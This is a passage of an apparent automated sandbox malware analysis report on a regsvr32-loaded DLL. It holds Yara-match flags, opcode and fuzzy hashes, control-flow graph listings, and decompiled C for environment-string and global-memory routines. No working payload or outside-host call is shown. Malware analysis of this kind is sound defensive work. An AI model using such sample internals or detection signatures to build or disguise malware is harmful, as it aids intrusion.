                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$Free$Process$AllocCommandCriticalDeleteDestroyLineSectionVersion
                                                                              • String ID:
                                                                              • API String ID: 4041283029-0
                                                                              • Opcode ID: 50875db719b0f751c4cf10f7d310c87572dbe5e957b84d183bee245a6be5f67c
                                                                              • Instruction ID: ff13390b269bfae1599e792f9dc7cf1c591ba7d109dedc360845971e243bcd3a
                                                                              • Opcode Fuzzy Hash: 50875db719b0f751c4cf10f7d310c87572dbe5e957b84d183bee245a6be5f67c
                                                                              • Instruction Fuzzy Hash: 8051A735700B418ED742EF22A80538A73E5FB88BDAF464125EA998B755EF7CE490CB11
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0000000180011E5C Relevance: 8.0, Strings: 6, Instructions: 545COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 308 180011e5c-180011f0e call 1800153f4 311 180011f11-180011f17 308->311 312 18001228a-180012290 311->312 313 180011f1d 311->313 316 180012534-180012596 call 180025c30 312->316 317 180012296-18001229c 312->317 314 180011f23-180011f29 313->314 315 1800121da-180012280 call 180011ccc 313->315 318 1800121d0-1800121d5 314->318 319 180011f2f-180011f35 314->319 315->312 336 1800125a2 316->336 337 180012598-18001259d 316->337 322 1800122a2-1800122a8 317->322 323 180012449-180012525 call 180015ae0 317->323 318->311 324 1800125c4-180012680 call 180011ccc 319->324 325 180011f3b-180011f41 319->325 329 1800123f7-180012439 call 180025c30 322->329 330 1800122ae-1800122b4 322->330 335 18001252a-18001252f 323->335 340 180012685-1800126a5 324->340 333 1800121b6-1800121cb 325->333 334 180011f47-180011f4d 325->334 329->340 349 18001243f-180012444 329->349 338 1800125b3-1800125b9 330->338 339 1800122ba-1800123f2 call 18000a02c call 180011624 330->339 333->311 343 180011f53-180011f59 334->343 344 180012126-180012198 call 18001917c 334->344 345 180012115-180012121 335->345 346 1800125a7-1800125b0 336->346 337->345 338->340 341 1800125bf 338->341 339->346 341->311 343->338 350 180011f5f-1800120af call 18000bab8 343->350 353 18001219d-1800121b1 344->353 345->311 346->338 349->345 350->335 357 1800120b5-180012112 call 1800216e4 350->357 353->345 357->345
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: :j$UI$UI$/$5$@u
                                                                              • API String ID: 0-1744832406
                                                                              • Opcode ID: d5fbd5fb42e64105118402a22ae1fd0938665267daf4f484be707b3cdea1b60d
                                                                              • Instruction ID: 62cabd7460019d857fad8ef6802a9940dae2da1dd4c69d60ad9891f806a9e916
                                                                              • Opcode Fuzzy Hash: d5fbd5fb42e64105118402a22ae1fd0938665267daf4f484be707b3cdea1b60d
                                                                              • Instruction Fuzzy Hash: 35421971A1470EDFCB58DFA8C49A6EEBBF2FB44348F008159E806A7250DB719619CB85
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0000000180026F14 Relevance: 6.9, Strings: 5, Instructions: 675COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: F:^-$[9S$zUP$?'3$yc
                                                                              • API String ID: 0-3875576172
                                                                              • Opcode ID: 149e3d3d365d4ff99a41c49fe7a0ea6fd866fcc9ad2b25dafda07a3e1acf3aff
                                                                              • Instruction ID: acf5a29543b44a4ac2cab22a28fc6f208f1c2d96f0abb29e90a070f971d4b191
                                                                              • Opcode Fuzzy Hash: 149e3d3d365d4ff99a41c49fe7a0ea6fd866fcc9ad2b25dafda07a3e1acf3aff
                                                                              • Instruction Fuzzy Hash: 13720C7050038E8FDF49DF24C88A6DE3BA1FB68388F114619FC56962A1C7B4DA65CBC5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0000000180001378 Relevance: 5.4, Strings: 4, Instructions: 391COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: %DcZ$L\`$u%$vr
                                                                              • API String ID: 0-873403245
                                                                              • Opcode ID: 2030f1da5196c9f476bb93962b4ebdec29646a183379a03d07fdefea4280d3e9
                                                                              • Instruction ID: 7a4330a3d3912fed14e69a2d18b4041e28774fe6b527757d4cbe653c4a95fa98
                                                                              • Opcode Fuzzy Hash: 2030f1da5196c9f476bb93962b4ebdec29646a183379a03d07fdefea4280d3e9
                                                                              • Instruction Fuzzy Hash: 0912F47152068CDFCB8CDF28C88AADD7BA1FB48398F956219FD0A97250D774D984CB84
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0000000180001D58 Relevance: 5.3, Strings: 4, Instructions: 321COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 545 180001d58-180001d95 546 180001d9a 545->546 547 180001d9c-180001da2 546->547 548 180001da8-180001dae 547->548 549 18000248e 547->549 551 180001db4-180001dba 548->551 552 180002197-1800021a4 548->552 550 180002493-180002499 549->550 550->547 553 18000249f-1800024ac 550->553 554 180001e9b-18000201d call 18000eef4 call 1800196ec 551->554 555 180001dc0-180001dc6 551->555 556 1800021a6-1800021ac 552->556 557 1800021ae-1800021ca 552->557 571 180002024-18000218c call 1800196ec call 180008db0 554->571 572 18000201f 554->572 555->550 560 180001dcc-180001e8b call 18001c158 555->560 558 1800021d0-180002470 call 18001d014 call 1800196ec call 180008db0 556->558 557->558 575 180002475-18000247d 558->575 560->553 567 180001e91-180001e96 560->567 567->547 571->553 580 180002192 571->580 572->571 575->553 577 18000247f-180002489 575->577 577->547 580->546
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: .mZ$\$~V6k$%T
                                                                              • API String ID: 0-3287852823
                                                                              • Opcode ID: ccbc70a1b43ffc6d5414b274ff0ecbed60153be03e3051f192a6aa15e06d1cac
                                                                              • Instruction ID: 166b9a2b8c7d7ea13ff64321e1c32e26f96a2e299ccb60065a18498a6503f561
                                                                              • Opcode Fuzzy Hash: ccbc70a1b43ffc6d5414b274ff0ecbed60153be03e3051f192a6aa15e06d1cac
                                                                              • Instruction Fuzzy Hash: 0402E8711013C8CBEBBECFA4D885BD97BA9FB44B44F10661AE84AAE250CBB45745CB41
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000000018002C6C8 Relevance: 4.0, Strings: 3, Instructions: 253COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 078$GDo$}
                                                                              • API String ID: 0-303245572
                                                                              • Opcode ID: 8956c442c33fd1cde17bd2344d54593dce01cac8c777ad426ea07fe8eec3f5fb
                                                                              • Instruction ID: 0c94e6823936b68487d3afc04f5daf4118d9ac6b30c0afcc694cd4a40111a1d0
                                                                              • Opcode Fuzzy Hash: 8956c442c33fd1cde17bd2344d54593dce01cac8c777ad426ea07fe8eec3f5fb
                                                                              • Instruction Fuzzy Hash: 32D1CAB051A784AFC398DF28C1CA94BBBE0FB84754F906A1DF88686260D7B0D945CF42
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0000000180025C30 Relevance: 3.8, Strings: 3, Instructions: 79COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: e@-0$f $wC
                                                                              • API String ID: 0-2741453468
                                                                              • Opcode ID: 6e670c046987691f0a1e9af823784eece018238e228c51a72b7d39087d84c909
                                                                              • Instruction ID: f8f9b13c1cb793f3116966172e7ed192e0f5529545d7cab8ca7c6d0d9d04acad
                                                                              • Opcode Fuzzy Hash: 6e670c046987691f0a1e9af823784eece018238e228c51a72b7d39087d84c909
                                                                              • Instruction Fuzzy Hash: E2319571518B848FD3A8DF28C48975ABBE1FB84344F608A1DE6DACB260DB709549CF42
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000000018002C2C8 Relevance: 2.6, Strings: 2, Instructions: 126COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: L=`$rKS(
                                                                              • API String ID: 0-4157335196
                                                                              • Opcode ID: 0ffd1ea2413f9b71380f5aeaf5e19bad7dcec336af59defbaf39c2d3ae1cfae5
                                                                              • Instruction ID: c6b4aee86e77721e5ec6a37c1ce5251b52915c7d30808e23b45806a77bf6ffc0
                                                                              • Opcode Fuzzy Hash: 0ffd1ea2413f9b71380f5aeaf5e19bad7dcec336af59defbaf39c2d3ae1cfae5
                                                                              • Instruction Fuzzy Hash: FD51BC705183848FC769DF29C18A64BBBF1FBC6784F108A1DE69A86261D772D909CF43
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0000000180026410 Relevance: 1.5, Strings: 1, Instructions: 234COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 8h
                                                                              • API String ID: 0-2787117397
                                                                              • Opcode ID: ab347b978aa1f63f7240bdbe3e1e3a5fb097f7ab112f221862d0ad0382d16821
                                                                              • Instruction ID: eb392778bd881193a348804f8d52045fa41d3382a0d9eae0dd8f361f159f4541
                                                                              • Opcode Fuzzy Hash: ab347b978aa1f63f7240bdbe3e1e3a5fb097f7ab112f221862d0ad0382d16821
                                                                              • Instruction Fuzzy Hash: 28D12E7060578C8FEBBADF24CC997DE3BA0FB49744F504219D88A8E260CB745B49CB42
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1003DF50 Relevance: 15.1, APIs: 10, Instructions: 132COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              C-Code - Quality: 27%
                                                                              			E1003DF50(void* __ebx, intOrPtr __ebp, long long __rax, long long __rbx, long long __rdi, long long __rsi, long long __rbp, long long __r12, long long _a8, long long _a16, long long _a24, long long _a32) {
				long long _v8;
				long long _v16;
				long long _v24;
				intOrPtr _v32;
				long long _v40;
				intOrPtr _t27;
				CHAR* _t28;
				int _t37;
				int _t39;
				void* _t45;
				void* _t46;
				intOrPtr _t51;
				long long _t60;
				long long _t64;
				short* _t67;
				signed long long _t69;
				short* _t84;
				long long _t91;
				long long _t92;
				int _t93;
				long long _t98;

				_t98 = __r12;
				_t92 = __rbp;
				_t86 = __rsi;
				_t80 = __rdi;
				_t60 = __rax;
				_t51 = __ebp;
				_t45 = __ebx;
				_t27 =  *0x10075468; // 0x1
				_a8 = __rbx;
				_a24 = __rsi;
				_a32 = __rdi;
				if(_t27 != 0) {
					L6:
					if(_t27 != 1) {
						if(_t27 == 2 || _t27 == 0) {
							goto L21;
						} else {
							goto L28;
						}
					} else {
						GetEnvironmentStringsW();
						_t84 = _t60;
						if(_t60 == 0) {
							goto L28;
						} else {
							goto L8;
						}
					}
				} else {
					GetEnvironmentStringsW(); // executed
					_t80 = __rax;
					if(__rax == 0) {
						if(GetLastError() != 0x78) {
							_t27 =  *0x10075468; // 0x1
							goto L6;
						} else {
							 *0x10075468 = 2;
							L21:
							_t28 = GetEnvironmentStrings();
							_t64 = _t60;
							if(_t60 == 0) {
								L28:
								return 0;
							} else {
								if( *_t60 != 0) {
									goto L24;
									do {
										do {
											L24:
											_t60 = _t60 + 1;
										} while ( *_t60 != 0);
										_t60 = _t60 + 1;
									} while ( *_t60 != 0);
								}
								_t88 = _t28 - _t45 + 1;
								E1003D3A0(_t46, _t60, _t64, _t28 - _t45 + 1, _t80, _t28 - _t45 + 1, _t92);
								if(_t60 != 0) {
									E1003AB00(_t46, _t60, _t64, _t88);
									return FreeEnvironmentStringsA(??);
								} else {
									FreeEnvironmentStringsA();
									goto L28;
								}
							}
						}
					} else {
						 *0x10075468 = 1;
						L8:
						_t67 = _t84;
						if( *_t84 != 0) {
							goto L10;
							do {
								do {
									L10:
									_t67 = _t67 + 2;
								} while ( *_t67 != 0);
								_t67 = _t67 + 2;
							} while ( *_t67 != 0);
						}
						_a16 = _t92;
						_v8 = _t98;
						r12d = 0;
						_t69 = _t67 - _t84 >> 1;
						_v16 = _t98;
						_v24 = _t98;
						_t8 = _t69 + 1; // 0x1
						r9d = _t8;
						_v32 = r12d;
						_v40 = _t98;
						_t37 = WideCharToMultiByte(??, ??, ??, ??, ??, ??, ??, ??);
						_t93 = _t37;
						if(_t37 == 0) {
							L18:
							FreeEnvironmentStringsW();
							_t39 = 0;
						} else {
							E1003D3A0(0, _t60, _t69, _t93, _t84, _t86, _t93);
							_t91 = _t60;
							if(_t60 == 0) {
								goto L18;
							} else {
								_v16 = _t98;
								_v24 = _t98;
								_t13 = _t69 + 1; // 0x1
								r9d = _t13;
								_v32 = _t51;
								_v40 = _t60;
								if(WideCharToMultiByte(??, ??, ??, ??, ??, ??, ??, ??) == 0) {
									E10039620(_t60, _t91);
									_t91 = _t98;
								}
								_t39 = FreeEnvironmentStringsW();
							}
						}
						return _t39;
					}
				}
			}
























                                                                              0x1003df50
                                                                              0x1003df50
                                                                              0x1003df50
                                                                              0x1003df50
                                                                              0x1003df50
                                                                              0x1003df50
                                                                              0x1003df50
                                                                              0x1003df54
                                                                              0x1003df5a
                                                                              0x1003df5f
                                                                              0x1003df66
                                                                              0x1003df6b
                                                                              0x1003dfa7
                                                                              0x1003dfaa
                                                                              0x1003e0a0
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1003dfb0
                                                                              0x1003dfb0
                                                                              0x1003dfb9
                                                                              0x1003dfbc
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1003dfbc
                                                                              0x1003df6d
                                                                              0x1003df6d
                                                                              0x1003df76
                                                                              0x1003df79
                                                                              0x1003df90
                                                                              0x1003dfa1
                                                                              0x00000000
                                                                              0x1003df92
                                                                              0x1003df92
                                                                              0x1003e0a6
                                                                              0x1003e0a6
                                                                              0x1003e0af
                                                                              0x1003e0b2
                                                                              0x1003e0f3
                                                                              0x1003e108
                                                                              0x1003e0b4
                                                                              0x1003e0b7
                                                                              0x00000000
                                                                              0x1003e0c0
                                                                              0x1003e0c0
                                                                              0x1003e0c0
                                                                              0x1003e0c0
                                                                              0x1003e0c4
                                                                              0x1003e0c9
                                                                              0x1003e0cd
                                                                              0x1003e0c0
                                                                              0x1003e0d7
                                                                              0x1003e0dd
                                                                              0x1003e0e8
                                                                              0x1003e112
                                                                              0x1003e136
                                                                              0x1003e0ea
                                                                              0x1003e0ed
                                                                              0x00000000
                                                                              0x1003e0ed
                                                                              0x1003e0e8
                                                                              0x1003e0b2
                                                                              0x1003df7b
                                                                              0x1003df7b
                                                                              0x1003dfc2
                                                                              0x1003dfc6
                                                                              0x1003dfc9
                                                                              0x00000000
                                                                              0x1003dfd0
                                                                              0x1003dfd0
                                                                              0x1003dfd0
                                                                              0x1003dfd0
                                                                              0x1003dfd4
                                                                              0x1003dfda
                                                                              0x1003dfde
                                                                              0x1003dfd0
                                                                              0x1003dfe7
                                                                              0x1003dfec
                                                                              0x1003dff1
                                                                              0x1003dff4
                                                                              0x1003dffa
                                                                              0x1003dfff
                                                                              0x1003e004
                                                                              0x1003e004
                                                                              0x1003e00c
                                                                              0x1003e011
                                                                              0x1003e016
                                                                              0x1003e01e
                                                                              0x1003e021
                                                                              0x1003e090
                                                                              0x1003e093
                                                                              0x1003e099
                                                                              0x1003e023
                                                                              0x1003e026
                                                                              0x1003e02e
                                                                              0x1003e031
                                                                              0x00000000
                                                                              0x1003e033
                                                                              0x1003e033
                                                                              0x1003e038
                                                                              0x1003e03d
                                                                              0x1003e03d
                                                                              0x1003e048
                                                                              0x1003e04c
                                                                              0x1003e059
                                                                              0x1003e05e
                                                                              0x1003e063
                                                                              0x1003e063
                                                                              0x1003e069
                                                                              0x1003e06f
                                                                              0x1003e031
                                                                              0x1003e08f
                                                                              0x1003e08f
                                                                              0x1003df79

                                                                              APIs
                                                                              • GetEnvironmentStringsW.KERNELBASE(?,?,?,?,?,?,?,?,10039278), ref: 1003DF6D
                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,10039278), ref: 1003DF87
                                                                              • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,?,10039278), ref: 1003DFB0
                                                                              • WideCharToMultiByte.KERNEL32 ref: 1003E016
                                                                              • WideCharToMultiByte.KERNEL32 ref: 1003E051
                                                                              • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,?,10039278), ref: 1003E069
                                                                              • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,?,10039278), ref: 1003E093
                                                                              • GetEnvironmentStrings.KERNEL32(?,?,?,?,?,?,?,?,10039278), ref: 1003E0A6
                                                                              • FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,?,?,?,10039278), ref: 1003E0ED
                                                                              • FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,?,?,?,10039278), ref: 1003E11A
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: EnvironmentStrings$Free$ByteCharMultiWide$ErrorLast
                                                                              • String ID:
                                                                              • API String ID: 4109468225-0
                                                                              • Opcode ID: e9189727efbcb3da120b97a60b274f59fd8dd181d72c91a1ca0d275ac8cd68e5
                                                                              • Instruction ID: fb6aac509265729a5b37d664de680fefdb58801714af1fc64f051d7c1d2a65fa
                                                                              • Opcode Fuzzy Hash: e9189727efbcb3da120b97a60b274f59fd8dd181d72c91a1ca0d275ac8cd68e5
                                                                              • Instruction Fuzzy Hash: 6B414F317047808AEB16DF21B94039AB7E5F789BD5F490125EE894BB59DFBCD891C700
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 100288AC Relevance: 15.1, APIs: 10, Instructions: 111memoryCOMMONLIBRARYCODE
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              C-Code - Quality: 51%
                                                                              			E100288AC(void* __ecx, void* __edx, void* __esi, void* __rcx, void* __r8, void* __r9, signed long long __r11) {
				void* __rbx;
				void* __rdi;
				void* _t44;
				void* _t50;
				void* _t54;
				signed long long _t69;
				void* _t71;
				signed long long _t72;
				signed long long _t73;
				intOrPtr _t76;
				intOrPtr _t79;
				intOrPtr _t89;
				void* _t94;
				intOrPtr _t95;
				void* _t96;
				void* _t99;
				signed long long _t100;

				_t100 = __r11;
				_t99 = __r9;
				_t96 = __r8;
				_t54 = __esi;
				_t50 = __edx;
				_t44 = __ecx;
				_t94 = __rcx;
				EnterCriticalSection(??);
				_t1 = _t94 + 4; // 0x300000020
				_t76 =  *_t1;
				_t2 = _t94 + 8; // 0x300000003
				_t95 =  *_t2;
				if(__esi >= __ecx) {
					L2:
					_t54 = 1;
					_t89 = _t95;
					if(_t95 >= _t76) {
						L6:
						if(_t54 >= _t44) {
							_t11 = _t76 + 0x20; // 0x300000040
							r12d = _t11;
							_t12 = _t94 + 0x10; // 0x3e4500
							_t79 =  *_t12;
							if(_t79 != 0) {
								GlobalHandle();
								_t80 = _t69;
								_t72 = _t69;
								GlobalUnlock(??);
								r11d = r12d;
								_t47 = 0xffffffff;
								_t101 = _t100 << 4;
								if(_t100 << 4 > _t69) {
									_t47 = 0x80070057;
									E10009538(0x80070057, _t50, _t69, _t72, _t80, _t89, _t94, _t96, _t99, _t101);
									asm("int3");
								}
								r8d = 0x2002;
								GlobalReAlloc(??, ??, ??);
							} else {
								_t69 = _t69 << 4;
								if(_t69 > _t79) {
									E10009538(0x80070057, _t50, _t69, _t71, _t79, _t89, _t94, _t96, _t99, _t100);
									asm("int3");
								}
								_t47 = 2; // executed
								GlobalAlloc(??, ??); // executed
							}
							if(_t69 == 0) {
								_t13 = _t94 + 0x10; // 0x3e4500
								if( *_t13 != 0) {
									GlobalHandle();
									GlobalLock(??);
								}
								LeaveCriticalSection();
								E100164FC();
								asm("int3");
							}
							GlobalLock();
							_t15 = _t94 + 4; // 0x300000020
							_t73 = _t69;
							_t16 = _t94 + 4; // 0x300000020
							E1003A240(r12d -  *_t16, _t47, 0, ( *_t15 << 4) + _t73, _t89, r12d -  *_t16 << 4);
							 *(_t94 + 4) = r12d;
							 *(_t94 + 0x10) = _t73;
						}
						L19:
						_t19 = _t94 + 0xc; // 0x3e450000000003
						if(_t54 >=  *_t19) {
							_t20 = _t95 + 1; // 0x3e450000000004
							 *((intOrPtr*)(_t94 + 0xc)) = _t20;
						}
						_t22 = _t94 + 0x10; // 0x3e4500
						 *( *_t22 + (_t54 + _t54) * 8) =  *( *_t22 + (_t54 + _t54) * 8) | 0x00000001;
						_t27 = _t95 + 1; // 0x3e450000000004
						 *((intOrPtr*)(_t94 + 8)) = _t27;
						LeaveCriticalSection(??);
						return _t54;
					}
					_t8 = _t94 + 0x10; // 0x3e4500
					_t69 =  *_t8 + 0x10;
					while(( *_t69 & 0x00000001) != 0) {
						_t89 = _t89 + 1;
						_t54 = _t54 + 1;
						_t69 = _t69 + 0x10;
						if(_t89 < _t76) {
							continue;
						}
						goto L6;
					}
					goto L6;
				}
				_t3 = _t94 + 0x10; // 0x3e4500
				_t69 =  *_t3;
				if(( *(_t69 + (_t95 + _t95) * 8) & 0x00000001) == 0) {
					goto L19;
				}
				goto L2;
			}




















                                                                              0x100288ac
                                                                              0x100288ac
                                                                              0x100288ac
                                                                              0x100288ac
                                                                              0x100288ac
                                                                              0x100288ac
                                                                              0x100288b7
                                                                              0x100288be
                                                                              0x100288c4
                                                                              0x100288c4
                                                                              0x100288c8
                                                                              0x100288c8
                                                                              0x100288ce
                                                                              0x100288e4
                                                                              0x100288e4
                                                                              0x100288ec
                                                                              0x100288ef
                                                                              0x1002890e
                                                                              0x10028910
                                                                              0x10028916
                                                                              0x10028916
                                                                              0x1002891a
                                                                              0x1002891a
                                                                              0x10028921
                                                                              0x1002894e
                                                                              0x10028954
                                                                              0x10028957
                                                                              0x1002895a
                                                                              0x10028960
                                                                              0x10028963
                                                                              0x10028968
                                                                              0x1002896f
                                                                              0x10028971
                                                                              0x10028976
                                                                              0x1002897b
                                                                              0x1002897b
                                                                              0x1002897f
                                                                              0x10028988
                                                                              0x10028923
                                                                              0x1002892b
                                                                              0x10028932
                                                                              0x10028939
                                                                              0x1002893e
                                                                              0x1002893e
                                                                              0x10028941
                                                                              0x10028946
                                                                              0x10028946
                                                                              0x10028991
                                                                              0x10028993
                                                                              0x1002899a
                                                                              0x1002899c
                                                                              0x100289a5
                                                                              0x100289a5
                                                                              0x100289af
                                                                              0x100289b5
                                                                              0x100289ba
                                                                              0x100289ba
                                                                              0x100289be
                                                                              0x100289c4
                                                                              0x100289ca
                                                                              0x100289d4
                                                                              0x100289e1
                                                                              0x100289e6
                                                                              0x100289ea
                                                                              0x100289ea
                                                                              0x100289ee
                                                                              0x100289ee
                                                                              0x100289f1
                                                                              0x100289f3
                                                                              0x100289f6
                                                                              0x100289f6
                                                                              0x100289f9
                                                                              0x10028a03
                                                                              0x10028a07
                                                                              0x10028a0a
                                                                              0x10028a11
                                                                              0x10028a23
                                                                              0x10028a23
                                                                              0x100288f1
                                                                              0x100288f5
                                                                              0x100288f9
                                                                              0x100288fe
                                                                              0x10028902
                                                                              0x10028905
                                                                              0x1002890c
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1002890c
                                                                              0x00000000
                                                                              0x100288f9
                                                                              0x100288d0
                                                                              0x100288d0
                                                                              0x100288de
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock
                                                                              • String ID:
                                                                              • API String ID: 2667261700-0
                                                                              • Opcode ID: 439dd60e3c5892077773f6770d2c7e67caf5381afc7b3ba8970396d42fda26cb
                                                                              • Instruction ID: 98539ecdcc663c3ef0ef6696bddf40bbfc808f555c7690d5696815e127406a0f
                                                                              • Opcode Fuzzy Hash: 439dd60e3c5892077773f6770d2c7e67caf5381afc7b3ba8970396d42fda26cb
                                                                              • Instruction Fuzzy Hash: 354135B6702A4093EB09CB25F9543A86361FB48B86F468121DF6E43B51DF78D9E1C700
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1003CDF0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28libraryloaderCOMMONLIBRARYCODE
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
